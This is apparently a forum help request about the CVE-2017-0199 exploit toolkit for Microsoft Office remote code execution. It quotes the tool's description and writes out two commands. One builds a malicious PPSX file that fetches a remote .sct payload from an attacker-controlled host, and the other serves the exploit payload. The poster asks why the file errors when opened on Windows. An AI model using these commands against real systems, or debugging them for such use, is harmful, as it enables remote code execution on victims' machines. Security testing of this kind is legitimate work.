Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
i generate a PPSX file using command below
python cve-2017-0199_toolkit.py -M gen -w HHolPdcurf.ppsx -u http://MYIP:90/myfile.sct -x 1
Then
python cve-2017-0199_toolkit.py -M exp -t PPSX -p 90 -H index.hta
But i keep getting error in the image below when i execute HHolPdcurf.ppsx on windows PC
am i missing something here?